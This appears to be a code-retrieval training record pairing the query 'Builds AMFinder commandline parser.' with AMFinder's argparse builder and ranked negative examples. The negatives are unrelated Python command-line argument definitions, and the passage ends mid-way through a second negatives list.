def diagnostic_subparser(subparsers): parser = subparsers.add_parser('diagnose', help='Runs AMFinder in diagnostic mode.', formatter_class=RawTextHelpFormatter) x = 'CNN1_pretrained_2021-01-18.h5' parser.add_argument('-net', '--network', action='store', dest='model', metavar='H5', type=str, default=x, help='name of the pre-trained model to use for diagnostic.' '\ndefault value: {}'.format(x)) x = PAR['input_files'] parser.add_argument('image', nargs='*', default=x, help='plant root scan to be processed.' '\ndefault value: {}'.format(x)) return parser
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_arguments(self, parser):", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def register_arguments(self):\n pass", "def __add_arguments__(cls, parser):", "def define_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"operation\", choices=[\"add\", \"subtract\", \"multiply\", \"divide\"], type=str)\n parser.add_argument(\"first_number\", help=\"The first number that will be calculated\", type=float)\n parser.add_argument(\"second_number\", help=\"The second number that will be calculated\", type=float)\n parser.add_argument(\"-w\", help=\"Add this option if you want a good morning message\", action=\"store_true\")\n\n return parser.parse_args()", "def arguments():\n main_desc = \"\"\"Debug awesome wm configurations in Xephyr sessions.\n\n Use `new` to create a new test config file cloned from your rc.lua\n Use `check` to test the Lua syntax on this file\n Use `start` to start a new awesome debug session\n Use `restart` to restart all awesome debug sessions\n Use `stop` to stop all awesome debug sessions\n \"\"\"\n\n parser = ArgumentParser(description=main_desc,\n formatter_class=RawDescriptionHelpFormatter)\n parser.add_argument(\"action\", choices=[\"new\", \"check\", \"start\", \"restart\",\n \"stop\"], help=\"the action to perform\")\n parser.add_argument(\"-t\", dest=\"test\", action=\"store_true\", default=False,\n help=\"use created test configuration file\")\n parser.add_argument(\"-s\", dest=\"screen\", help=\"the screen resolution\")\n parser.add_argument(\"-d\", dest=\"display\", help=\"the DISPLAY to use\")\n parser.add_argument(\"-v\", \"--version\", action=\"version\",\n version=\"%(prog)s {0}\".format(__version__),\n help=\"show program's version number and exit\")\n return parser", "def define_parameters(self):\n self.add_argument('--prefix', dest='prefix', type=str, optional=False,\n help='prefix for file names')\n self.add_argument('--sleepLength',\n dest = 'sleepLength',\n type = str,\n optional = True,\n help ='time to sleep before performing plugin action',\n default = '0')", "def add_arguments(self, parser):\n pass", "def add_arguments(self, parser):\n pass", "def prepare_arguments(self, parser):\n pass", "def _build_arguments(self):\n # TODO: comeback to allow test path override. maybe?\n # self._parser.add_argument(\n # '--test-path',\n # type=utils.validate_path,\n # required=False,\n # help=('Path th projects test Dockerfile. Dockerfile should be in the root of the test directory.')\n # )\n self._parser.add_argument(\n '--configs',\n type=bool,\n required=False,\n default=False,\n help=\"Would you like to inject configuration files?\"\n )", "def add_val_arguments(self):\n self.add_test_arguments()", "def definearguments(self, customparser):\n if not customparser:\n return\n customparser.add_option(\n '--url',\n dest='url',\n help=\"Use the provided iLO URL to login.\",\n default=None,\n )\n customparser.add_option(\n '-u',\n '--user',\n dest='user',\n help=\"If you are not logged in yet, including this flag along\"\\\n \" with the password and URL flags can be used to log into a\"\\\n \" server in the same command.\"\"\",\n default=None,\n )\n customparser.add_option(\n '-p',\n '--password',\n dest='password',\n help=\"\"\"Use the provided iLO password to log in.\"\"\",\n default=None,\n )\n customparser.add_option(\n '-e',\n '--enc',\n dest='encode',\n action='store_true',\n help=SUPPRESS_HELP,\n default=False,\n )", "def definearguments(self, customparser):\n\n customparser.add_option(\n '--disable',\n action=\"store_false\",\n dest=\"enableFeature\",\n help=\"Disable the Scalable Persistent Memory feature. Warning: \"\\\n \"any pending configuration changes will be lost.\"\n )", "def add_arguments(parser):\n return", "def _set_arguments(self):\n self._arguments = []", "def add_extra_args(self):\n self.parser.add_argument('--device', dest='device', type=str, help='Device ID, e.g. d--0001')", "def definearguments(self, customparser):\r\n if not customparser:\r\n return\r\n\r\n self.cmdbase.add_login_arguments_group(customparser)\r\n customparser.add_argument(\r\n \"--reboot\",\r\n dest=\"reboot\",\r\n help=\"Use this flag to perform a reboot command function after\"\r\n \" completion of operations. For help with parameters and\"\r\n \" descriptions regarding the reboot flag, run help reboot.\",\r\n default=None,\r\n )", "def _setup_arguments(self):\n\n self._parser.add_argument(\"-a\", \"--area-interest\",\n help=\"Area of interest to process, \"\n \"shapefile path\", required=True)\n # FUTURE VERSIONS\n # self._parser.add_argument(\"-s\", \"--srtm-dem\",\n # help=\"Path to SRTM DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-y\", \"--hsheds-dem\",\n # help=\"Path to HSHEDS DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-g\", \"--groves-file\",\n # help=\"Path to groves classification file. \"\n # \"Zip format\",\n # required=False)", "def add_arguments(cls):\n return [\n (('--yes',), dict(action='store_true', help='clean .git repo')),\n (('--variable', '-s'),\n dict(nargs='+', help='set extra variable,format is name:value')),\n (('--skip-builtin',),\n dict(action='store_true', help='skip replace builtin variable')),\n\n (('--dir',), dict(nargs='?', default=os.getcwd(),\n help='set working directory')),\n (('--debug',), dict(action='store_true', help='open debug mode')),\n (('--dry-run',), dict(action='store_true',\n help='print command instead execute it')),\n (('--verbose', '-v'), dict(action='count')),\n ]", "def Args(parser):", "def setup_args(cls) -> ParlaiParser:\n # we want to later deprecate this for add_cmdline_args", "def help_args():\n pass", "def fill_args(cls, toolchain, parser):\n pass # pass must be overloaded (if required)", "def argumente():\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('-d', '--device', type=str, default=\"/dev/ttyUSB0\",\n\thelp=\"Der Name der Schnittstelle die angesprochen werden soll. Default ist %(default)s\")\n\tparser.add_argument('-T', '--trigger', type=int, default=\"3\",\n\thelp=\"Der Trigger der verwendet werden soll. Default ist %(default)s\")\n\tparser.add_argument('-t', '--time', type=int, default=\"10\",\n\thelp=\"Laufzeit fuer eine Messung. Default ist %(default)s\")\n\n\tparser.add_argument('-s', '--schwellen', type=int, nargs=\"*\", default=[100, 100, 100],\n\thelp=\"Schwellenspannungen (in mV) fuer die drei Kanaele. Default ist %(default)s\")\n\n\tparser.add_argument('-g', '--graphical', action=\"store_true\",\n\thelp=\"Erzeuge eine grafische Darstellung von Messreihen. Wenn diese Option \\\n\t\t\tnicht gesetzt ist wird einfach das Ergebnis einer Messung im Terminal ausgegeben.\")\n\n\treturn parser.parse_args()", "def add_extra_arguments(self, parser):\n pass", "def add_arguments(parser):\n parser.add_argument('-e', '--environment', help='Environment name', required=True)\n parser.add_argument('-w', '--dont-wait', help='Skip waiting for the init to finish', action='store_true')\n parser.add_argument('-l', '--version-label', help='Version label', required=False)", "def _add_arguments(self):\r\n self._parser.add_argument(\r\n '-s', '--server',\r\n required=True,\r\n help=\"enter server name\")\r\n self._parser.add_argument(\r\n '-db', '--database',\r\n required=True,\r\n help='enter database name')\r\n self._parser.add_argument(\r\n '-u', '--username',\r\n help='enter username')\r\n self._parser.add_argument(\r\n '-p', '--password',\r\n help='enter password')\r\n #self._parser.add_argument(\r\n # '-h', '--help',\r\n # help='show this help message and exit')\r", "def add_common_arguments(self, short_options=True):\n getopts = lambda *args: args if short_options else args[1:]\n self.add_argument(*getopts('-d', '--debug'), action='store_true',\n help='Run with debug output.')\n self.add_argument(*getopts('-q', '--quiet'), action='count', default=0,\n help='Use once to hide info messages, twice to hide '\n 'warnings, and thrice to hide errors.')", "def add_extra_args(self):\n pass", "def get_cli_arguments(self):\n pass", "def full_args():\n return setup_args()", "def setup_args(cls, parser):\n pass", "def get_pytest_arguments(self, config_section):\n pass", "def arguments():\n\tparser = argparse.ArgumentParser(description=\"Integrate all columns of a data file. Time is in column 0.\")\n\tparser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", dest=\"verbose\", default=False, help=\"Print debug info.\")\n\tparser.add_argument(\"-k\", \"--kwh\", action=\"store_true\", dest=\"kwh\", default=False, help=\"output in kWh (instead of Ws)\")\n\tparser.add_argument(\"-f\", \"--file\", action=\"store\", dest=\"filename\", help=\"Path to file to read. Defaults to STDIN.\")\n\tparser.add_argument(\"-s\", \"--separator\", dest=\"separator\", default=\",\", help=\"Specify the separation character. Defaults to comma (,).\")\n\n\treturn parser.parse_args()", "def parse_arguments(args):", "def define_parameters(self):", "def extra_target_arguments(self):\n return {}", "def add_arguments(cls, arg_parser: ArgParser) -> None:", "def add_arguments(self, parser):\n parser.add_argument('--print', action='store_true', required=False, help='Print details')", "def _set_arguments(self):\n cert_location = f\"dependencies{sep}certificates{sep}localuser.crt\"\n key_location = f\"dependencies{sep}certificates{sep}localuser.key\"\n assert Path(cert_location).exists(), (\n f\"The certificate isn't \"\n f\"present at location {Path(cert_location).absolute()}\"\n )\n assert Path(key_location).exists(), (\n f\"The certificate key isn't \"\n f\"present at location {Path(key_location).absolute()}\"\n )\n self._arguments = [\n (\n \"test-certificate-verify\",\n [\"-k\", key_location, \"-c\", cert_location],\n ),\n (\n \"test-sig-algs\",\n [],\n ),\n (\n \"test-clienthello-md5\",\n [],\n ),\n (\n \"test-tls13-pkcs-signature\",\n [],\n ),\n ]", "def args_str(self):", "def add_args(self, parser):", "def init_args(self):\n return {\n \"doc\": self.__doc__.format(name=colored(self.module_name, \"green\", attrs=['bold','underline'])),\n \"Url\": \"set a target url\",\n 'Type': \"set type to check , [php, asp, aspx, cgi, dir , mdb]\",\n }", "def base_arguments(self):\n raise NotImplementedError()", "def add_arguments(self):\n super().add_arguments()\n self.parser.add_argument(\n \"sql_command\",\n help=\"The SQL commmand to execute. Use <odb> to reference the filename.\",\n type=str\n )", "def arguments(**kw):\n return export_arguments('cc', _all_arguments, _groups, **kw)", "def definearguments(self, customparser):\r\n if not customparser:\r\n return\r\n\r\n self.cmdbase.add_login_arguments_group(customparser)\r\n\r\n customparser.add_argument(\r\n \"--fulltypes\",\r\n dest=\"fulltypes\",\r\n action=\"store_true\",\r\n help=\"Optionally include this flag if you would prefer to \"\r\n \"return the full type name instead of the simplified versions\"\r\n \" (Redfish only option).\",\r\n default=None,\r\n )", "def definearguments(self, customparser):\n if not customparser:\n return\n\n add_login_arguments_group(customparser)\n\n customparser.add_argument(\n '--serviceaccount',\n dest='serviceacc',\n action=\"store_true\",\n help=\"Optionally include this flag if you wish to created account \"\\\n \"to be a service account.\",\n default=False\n )\n customparser.add_argument(\n '--addprivs',\n dest='optprivs',\n nargs='*',\n action=_AccountParse,\n type=str,\n help=\"Optionally include this flag if you wish to specify \"\\\n \"which privileges you want added to the iLO account. This overrides the default of \"\\\n \"duplicating privileges of the currently logged in account on the new account. Pick \"\\\n \"privileges from the privilege list in the above help text. EX: --addprivs=1,2,4\",\n default=None\n )\n customparser.add_argument(\n '--removeprivs',\n dest='optprivs',\n nargs='*',\n action=_AccountParse,\n type=str,\n help=\"Optionally include this flag if you wish to specify \"\\\n \"which privileges you want removed from the iLO account. This overrides the default of\"\\\n \" duplicating privileges of the currently logged in account on the new account. Pick \"\\\n \"privileges from the privilege list in the above help text. EX: --removeprivs=1,2,4\",\n default=None\n )\n customparser.add_argument(\n '--role',\n dest='role',\n choices=['Administrator', 'ReadOnly', 'Operator'],\n help=\"Optionally include this flag if you would like to specify Privileges by role. \"\\\n \"Valid choices are: Administrator, ReadOnly, Operator\",\n default=None\n )\n customparser.add_argument(\n '-j',\n '--json',\n dest='json',\n action=\"store_true\",\n help=\"Optionally include this flag if you wish to change the\"\\\n \" displayed output to JSON format. Preserving the JSON data\"\\\n \" structure makes the information easier to parse.\",\n default=False\n )", "def command_line_arguments():\n\n try:\n parser = argparse.ArgumentParser(description='Log Handler/Cleaner/Copier for Idemia DocAuth')\n\n # Add required arguments.\n parser.add_argument('action', choices=['clean', 'download'], type=str, help='clean or download')\n\n # Parse the arguments\n args = parser.parse_args()\n\n return args\n\n except Exception as err:\n print(err)\n return", "def __add_common_args(parser: argparse.ArgumentParser):\n parser.add_argument(\"--model\", help=\"name of the model to use. Use query --get-models to get a list of valid names.\")\n parser.add_argument(\"--grid-type\", help=\"type of the grid to use.\")\n parser.add_argument(\"--level-type\", help=\"type of the vertical level to use.\")\n parser.add_argument(\"--init-time\", help=f\"initialization time to use. \"\n \"Integers are interpreted as hours since model start, dates formatted as \"\n f\"{__DATE_FORMAT.replace('%Y', 'YYYY').replace('%m', 'MM').replace('%d', 'DD').replace('%H', 'HH').replace('%M', 'MM')} are interpreted as absolute start dates.\")\n parser.add_argument(\"--variable\", nargs=\"+\", help=\"name of the variable to use. Use query --get-vars to get a list of valid names.\")\n parser.add_argument(\"--levels\", nargs=\"+\", type=int, help=\"levels to use.\")\n parser.add_argument(\"--lead-time\", nargs=\"+\", type=int, help=\"lead times to use in hours.\")", "def get_arguments():\n\n # Creates the ArgumentParser\n parser = argparse.ArgumentParser(\n usage='Optimizes a boolean-based ensemble using Univariate Marginal Distribution Algorithm.')\n\n # Adds a dataset argument with pre-defined choices\n parser.add_argument('dataset', help='Dataset identifier', choices=['RSDataset', 'RSSCN7', 'UCMerced_LandUse'])\n\n # Adds a descriptor argument with pre-defined choices\n parser.add_argument('descriptor', help='Descriptor identifier', choices=['global', 'cnn', 'all'])\n\n # Adds an identifier argument to the desired fold identifier\n parser.add_argument('fold', help='Fold identifier', type=int, choices=range(1, 6))\n\n # Adds an identifier argument to the desired number of agents\n parser.add_argument('-n_agents', help='Number of meta-heuristic agents', type=int, default=10)\n\n # Adds an identifier argument to the desired number of iterations\n parser.add_argument('-n_iter', help='Number of meta-heuristic iterations', type=int, default=10)\n\n return parser.parse_args()", "def arg_err(self,func):\n print 'Error in arguments:'\n print inspect.getdoc(func)", "def __getinitargs__(self):\n\n return (self.admin_property_err,)", "def add_arguments_imp(self, parser): # noqa\n parser.add_argument(\n 'what',\n nargs='?',\n help=(\n 'Print the value of /ROOT/<what>_dir. For example: ' +\n '\"dodo which src\" prints the value of /ROOT/src_dir.')\n )\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n '--config',\n action=\"store_true\",\n help='Print where the config file is')\n group.add_argument(\n '--script',\n help='Print where the dodo command script with given name is')", "def command_line_arguments():\n _parser.add_argument('-l', '--list', nargs='+',\n help='<Required> Set flag', required=True)\n _parser.add_argument(\"-A\", \"--access\", required=True,\n help=\"access to host => grant/revoke\")", "def add_args(parser):\r\n parser.add_argument(\"data\", help=\"path to data directory\")\r\n parser.add_argument(\r\n \"--silence-token\", default=\"\\u2581\", help=\"token for silence (used by w2l)\"\r\n )\r\n parser.add_argument(\r\n \"--max-source-positions\",\r\n default=sys.maxsize,\r\n type=int,\r\n metavar=\"N\",\r\n help=\"max number of frames in the source sequence\",\r\n )\r\n parser.add_argument(\r\n \"--max-target-positions\",\r\n default=1024,\r\n type=int,\r\n metavar=\"N\",\r\n help=\"max number of tokens in the target sequence\",\r\n )", "def add_app_arguments(self, parser: argparse.ArgumentParser):\n pass", "def define_parameters(self):\n\n self.add_argument('--input1',dest='input1',type=str,optional=False,\n help='What file do you want to upload?')\n self.add_argument('--input2',dest='input2',type=str,optional=False,\n help='What file do you want to upload?')", "def add_arguments(self, sub_parser):\n sp = sub_parser", "def Args(parser):\n flags.AddRegion(parser)\n flags.AddCluster(parser)", "def __common_args_handler(parser):\n parser.add_argument(\"-netloc\", help=\"<host>:<port>\", default=\"[::]:50051\", type=str)\n parser.add_argument(\"-debug\", help=\"Print debug messages.\", action=\"store_true\")\n args = parser.parse_args(sys.argv[2:])\n logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)\n return args", "def apply_args(self):\n\n args = self.args\n\n Test.compile_only = args.compile_only\n Test.skip_comparison = args.skip_comparison\n Test.global_tolerance = args.tolerance\n Test.global_abs_tolerance = args.abs_tolerance\n Test.global_particle_tolerance = args.particle_tolerance\n Test.performance_params = args.check_performance", "def add_required_arguments(self, *args):\n self._add_sample_specific_arguments(True, *args)", "def add_app_arguments(self, parser: argparse.ArgumentParser) -> None:\n pass", "def add_extra_args(self):\n self.parser.add_argument(\"--region\", required=False)\n self.parser.add_argument(\"--zone\", required=False)\n self.parser.add_argument(\"--network\", required=False)", "def set_options():\n parser = argparse.ArgumentParser(description='test hexrd.quadrature')\n\n return parser", "def get_arguments():\n\tparser.add_argument('-i', '--interface', help='interface to affect')\n\tparser.add_argument('-m','--mac', help='mac to allocate')\n\n\targs = parser.parse_args()\n\tinterface = args.interface\n\tmac = args.mac\n\treturn (interface, mac)", "def process_arguments():\n # Create ArgumentParser object. Description message will be displayed as part of help message if script is run with -h flag\n parser = argparse.ArgumentParser(description='Prints tier 1 and 2 variant details to stdout for a given 100k case')\n # Define the arguments that will be taken.\n parser.add_argument('-i', '--ir_id', required=True, help='GeL Interpretation Request ID in format 12345-1')\n parser.add_argument('-p', '--proband_id', required=True, help='GeL participant ID for proband')\n # Return the arguments\n return parser.parse_args()", "def arguments_base(token):\n return Arguments(\n verbose=TEST_VERBOSE,\n token=token,\n slug=TEST_SLUG,\n tag=TEST_TAG,\n body=TEST_BODY,\n rel_name=TEST_REL_NAME,\n commitish=TEST_COMMITISH\n )", "def __init__( self ):\n self.arguments = []\n self._opt_specs = []\n self._pos_specs = []\n self._values = {}", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def declare_gather_args():\n\n # declare args\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('values', help='comma-separated values to barchart')\n parser.add_argument('--labels', help='comma-separated labels for barchart')\n parser.add_argument('--title', help='title', default='')\n parser.add_argument('--rotatelabels', help='rotate labels 90 degrees?', action=\"store_true\")\n parser.add_argument('--outpdf', required=True, type=argparse.FileType('w'),\n help='output file')\n\n parser.add_argument('--debug', action=\"store_true\", help='Enable debug logging')\n return parser.parse_args()", "def get_arguments():\n\n # Creates the ArgumentParser\n parser = argparse.ArgumentParser(usage='Creates an ensemble of classifiers based on majority voting.')\n\n # Adds a dataset argument with pre-defined choices\n parser.add_argument('dataset', help='Dataset identifier', choices=['RSDataset', 'RSSCN7', 'UCMerced_LandUse'])\n\n return parser.parse_args()", "def Args(parser):\n parser.add_argument('--service', '-s', help='Limit to specific service.')\n parser.add_argument('--version', '-v', help='Limit to specific version.')\n parser.add_argument('--limit', required=False, type=int,\n default=200, help='Number of log entries to show.')\n parser.add_argument('--level', required=False, default='any',\n choices=LOG_LEVELS,\n help='Filter entries with severity equal to or higher '\n 'than a given level.')\n\n parser.add_argument('--logs',\n required=False,\n default=['stderr', 'stdout', 'crash.log'],\n metavar='APP_LOG',\n type=arg_parsers.ArgList(min_length=1),\n help=('Filter entries from a particular set of logs. '\n 'Must be a comma-separated list of log names '\n '(request_log, stdout, stderr, etc).'))", "def _configure_args(self, parser: ArgumentParser) -> ArgumentParser:\n pass", "def Args(parser):\n parser.add_argument('metric_name', help='The name of the new metric.')\n parser.add_argument(\n '--description', required=True,\n help='The metric\\'s description.')\n parser.add_argument(\n '--log-filter', required=True,\n help='The metric\\'s filter expression. '\n 'The filter must be for a V2 LogEntry.')", "def add_args(self):\n raise NotImplementedError", "def add_arguments(self, parser):\n parser.add_argument('asins', nargs='+', type=str)", "def add_step_args(cls, parser):", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLab-ResNet Network\")\n parser.add_argument(\"--mode\", choices={\"SUM\", \"VAL\"}, default=\"VAL\", help=\"\")\n parser.add_argument(\"--sdf-path\", type=str, default=SDF_PATH, help=\"\")\n parser.add_argument(\"--summary-file\", type=str, default=SUMMARY_FILE, help=\"\")\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--adj', help=\"\"\".adj file regulon\"\"\", \n type=argparse.FileType(mode='r'), required=True)\n parser.add_argument('--expr_genes', help=\"\"\"list of gene IDs in expression \n matrix (first column of expr matrix)\"\"\", \n type=argparse.FileType(mode='r'), required=True)\n # parser.add_argument('--cutoff_percent', help=\"\"\"remove entire row (regulator plus genes)\n # if percent (out of 100) of genes remaining is below this value AND # genes remaining is below\n # the cutoff_number argument\"\"\", type=int, required=False, default=30)\n \n parser.add_argument('--cutoff_number', help=\"\"\"\"remove entire row (regulator plus regulon genes)\n if number of genes remaining is below this value, defaults to 25\"\"\", type=int, required=False, default=25)\n args = parser.parse_args()\n\n return args", "def args(self, value):\n # obtener la linea de comandos convertida a dict, eliminando algunos\n self._args = self.clean_command_line(value)\n\n # obtener el archivo de configuracion\n config = self.get_config()\n\n # Cliente actual, de los parametros, este siempre tiene precedencia\n client = self._args.get('client')\n\n # Fallback lo saco de la configuracion, y si tampoco esta es un error\n if not client:\n client = config.get('client')\n self._args['client'] = client\n\n # si aca no tengo definido el cliente termino con error\n if not client:\n msg.err('Need -c option (client name). Process aborted')\n\n # obtener la configuracion para el cliente actual.\n client_config = config.get(client, {})\n\n # Mezclo argumentos de linea de comandos con configuracion\n # la linea de comandos tiene precedencia\n for item in client_config or []:\n if item not in self._args:\n self._args[item] = client_config.get(item)\n\n # agregar valores por defecto si no estan definidos\n self.add_default_values()\n\n # si aca no tengo definido la aplicacion default termino con error\n if not self._args.get('defapp'):\n msg.err('Need --defapp option (default application). '\n 'Process aborted')\n\n self.save_config()", "def report_args(args):\n\n print (\"SETTINGS:\\n\")\n print (\"-f : Output data file >> {:s}\".format(args.file))\n print (\"-l : Length of data series >> {:d}\".format(args.length))\n print (\"-p : Process >> {:s}\".format(args.process))\n print (\"-d : Ouput diretory >> {:s}\".format(args.directory))\n print (\"\\n\")", "def getPositionalArgs():", "def __init__(self, *args, **kwargs):\n argparse.ArgumentParser.__init__(self, *args, **kwargs)\n self.add_argument(\n '--log-level', env_var='COSA_LOG_LEVEL', default='info',\n choices=log._nameToLevel.keys(), help='Set the log level')", "def extra_args(self):\n return []", "def __add_arguments__(cls, parser: ArgumentParser) -> None:\n\n parser.add_argument(\n \"-j\",\n \"--json_local_path\",\n required=True,\n type=str,\n help=(\n \"Full path to the local json dictionary saved in the validation step, eg /mnt/vol/dict.json.\"\n ),\n )\n\n parser.add_argument(\n \"-n\",\n \"--dictionary_name\",\n required=True,\n type=str,\n help=(\n \"The human readable name for the data dictionary, eg 'baseline' or 'follow up'.\"\n ),\n )\n\n parser.add_argument(\n \"-s\",\n \"--study_id\",\n required=True,\n type=str,\n help=(\n \"The MDS study id associated with the data set.\"\n ),\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n required=True,\n type=str,\n help=(\n \"Path to write out the JSON response with upload_status.\"\n ),\n )", "def AddArguments(cls, argument_group):", "def args(self, args):\n self._instructions_setter('ARG', args)", "def construct_arguments(self, x):\n\n # Denormalize free parameters\n denormalized_values = self.denormalize_bounds(x)\n arguments = dict(zip(self.free_parameters, denormalized_values.flatten()))\n \n\n self.log_vars = ['connectivity', 'llambda', 'llambda2', 'enet_strength',\n 'noise', 'regularization', 'dt', 'gamma_cyclic' \n ]\n\n # Add fixed parameters\n for name in self.fixed_parameters:\n value = self.bounds[name]\n arguments[name] = value\n # if name in self.log_vars:\n # arguments[name] = 10. ** value\n # else:\n \n\n for var in self.log_vars:\n if var in arguments:\n arguments[var] = 10. ** arguments[var] # Log scale correction\n\n #assert False, f'args {arguments}'\n\n if 'n_nodes' in arguments:\n arguments['n_nodes'] = tensor(arguments['n_nodes'], dtype = torch.int32, device = self.device, requires_grad = False) # Discretize #torch.adjustment required\n\n if not self.feedback is None:\n arguments['feedback'] = self.feedback\n \n for argument, val_tensor in arguments.items():\n \n try:\n arguments[argument] = arguments[argument].item()\n except:\n arguments[argument] = arguments[argument]\n return arguments", "def cli(*args, **kwargs):\n logger.debug('Global options: %s %s', args, kwargs)", "def arguments(self, arguments):\n\n self._arguments = arguments", "def add_command_line_arguments(self, parser):\n # parser.add_option(...)\n pass", "def add_cmdline_args(cls, argparser):\n agent = argparser.add_argument_group('Safe Local Human Arguments')\n agent.add_argument(\n '--safety',\n type=str,\n default='all',\n choices={'none', 'string_matcher', 'classifier', 'all'},\n help='Apply safety filtering to messages',\n )\n super(SafeLocalHumanAgent, cls).add_cmdline_args(argparser)" ]
[ "0.67259675", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.65979254", "0.6563293", "0.65430915", "0.6472136", "0.64492387", "0.64492387", "0.64112806", "0.63782823", "0.6311546", "0.6246682", "0.6226592", "0.6199888", "0.61745524", "0.61669433", "0.61669123", "0.6147256", "0.61315453", "0.6127668", "0.61140746", "0.6099239", "0.60826594", "0.6079387", "0.607041", "0.60540926", "0.60515136", "0.60361147", "0.60358506", "0.601154", "0.59951425", "0.5984163", "0.59799063", "0.59794086", "0.59724075", "0.5957235", "0.59421116", "0.59378576", "0.593626", "0.5929914", "0.5929379", "0.5918555", "0.59180236", "0.5913985", "0.59009147", "0.5870313", "0.5868232", "0.5858202", "0.5843976", "0.58340216", "0.5820698", "0.5818526", "0.5808907", "0.57804906", "0.57771254", "0.5776181", "0.57676286", "0.57624525", "0.57470447", "0.57319754", "0.5724683", "0.5722328", "0.5687946", "0.5687698", "0.56770295", "0.56678003", "0.56672066", "0.56595325", "0.5656694", "0.5656377", "0.5654538", "0.565266", "0.56520796", "0.5636565", "0.56316143", "0.5631216", "0.5627731", "0.5627165", "0.56208456", "0.56199586", "0.56126124", "0.559856", "0.55893743", "0.5588341", "0.55713254", "0.55668414", "0.5559327", "0.55582154", "0.55562216", "0.55533904", "0.5549863", "0.55488586", "0.5541531", "0.5541176" ]
0.0
-1
Builds AMFinder commandline parser.
def build_arg_parser(): main = ArgumentParser(description='AMFinder command-line arguments.', allow_abbrev=False, formatter_class=RawTextHelpFormatter) subparsers = main.add_subparsers(dest='run_mode', required=True, help='action to be performed.') _ = training_subparser(subparsers) _ = prediction_subparser(subparsers) _ = diagnostic_subparser(subparsers) return main
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_parser(self, parser: ArgumentParser) -> None:", "def create_parser() -> configargparse.ArgParser:\n parser = configargparse.ArgParser(default_config_files=[\n \"/etc/lookout/analyzer.conf\", \"~/.config/lookout/analyzer.conf\"],\n formatter_class=ArgumentDefaultsHelpFormatterNoNone,\n auto_env_var_prefix=\"lookout_\")\n slogging.add_logging_args(parser)\n subparsers = parser.add_subparsers(help=\"Commands\", dest=\"command\")\n\n def add_parser(name, help):\n return subparsers.add_parser(\n name, help=help, formatter_class=ArgumentDefaultsHelpFormatterNoNone)\n\n list_parser = add_parser(\"list\", \"Print globally available analyzers.\")\n list_parser.set_defaults(handler=list_analyzers)\n\n run_parser = add_parser(\n \"run\", \"Launch a new service with the specified (one or more) analyzers.\")\n run_parser.set_defaults(handler=run_analyzers)\n add_analyzer_arg(run_parser)\n run_parser.add(\"-c\", \"--config\", is_config_file=True,\n help=\"Path to the configuration file with option defaults.\")\n run_parser.add(\"-s\", \"--server\", required=True,\n help=\"Lookout server address, e.g. localhost:1234.\")\n run_parser.add(\"-w\", \"--workers\", type=int, default=1,\n help=\"Number of threads which process Lookout events.\")\n add_model_repository_args(run_parser)\n run_parser.add_argument(\"--request-server\", default=\"auto\",\n help=\"Address of the data retrieval service. \\\"same\\\" means --server.\")\n\n init_parser = add_parser(\"init\", \"Initialize the model repository.\")\n init_parser.set_defaults(handler=init_repo)\n add_model_repository_args(init_parser)\n\n tool_parser = add_parser(\"tool\", \"Invoke the tooling of a given analyzer.\")\n tool_parser.set_defaults(handler=run_analyzer_tool)\n tool_parser.add(\"analyzer\", help=\"Fully qualified package name with an analyzer.\")\n tool_parser.add(\"args\", nargs=argparse.REMAINDER)\n\n package_parser = add_parser(\n \"package\",\n \"Package several analyzers to a Docker container and write a sample Docker Compose config \"\n \"for Lookout.\")\n package_parser.set_defaults(handler=package_cmdline_entry)\n add_analyzer_arg(package_parser)\n package_parser.add(\"-w\", \"--workdir\", help=\"Generate files in this directory.\",\n default=tempfile.mkdtemp(prefix=\"lookout_package_\"))\n package_parser.add(\"--requirements\", help=\"Path to a custom requirements.txt\")\n package_parser.add(\"-r\", \"--repo\", help=\"GitHub repository name to watch. \"\n \"Example: \\\"src-d/lookout\\\".\",\n required=True)\n package_parser.add(\"-u\", \"--user\", help=\"GitHub user name which will send review comments.\",\n required=True)\n paturl = \"https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/\" # noqa\n package_parser.add(\"-t\", \"--token\", help=\"GitHub token for -u/--user. See \" + paturl,\n required=True)\n package_parser.add(\"-y\", \"--yes\", help=\"Run the commands in the end.\",\n action=\"store_true\")\n package_parser.add(\"-n\", \"--no\", help=\"Do not run the commands in the end.\",\n action=\"store_true\")\n return parser", "def build_parser(self):\n parser = argparse.ArgumentParser(\n description=\"Run Crystal Matching algorithm attempting to translate co-ordinates \"\n \"on an input image to the coordinate-space of an output image while \"\n \"accounting for possible movement of crystals in the sample.\")\n\n if sys.version_info[0] < 3:\n parser.add_argument('Formulatrix_image',\n metavar=\"Formulatrix_image_path\",\n type=file,\n help='Image file from the Formulatrix - selected_point should correspond to co-ordinates on '\n 'this image.')\n else:\n parser.add_argument('Formulatrix_image',\n metavar=\"Formulatrix_image_path\",\n type=argparse.FileType('r'),\n help='Image file from the Formulatrix - selected_point should correspond to co-ordinates on '\n 'this image.')\n parser.add_argument('beamline_stack_path',\n 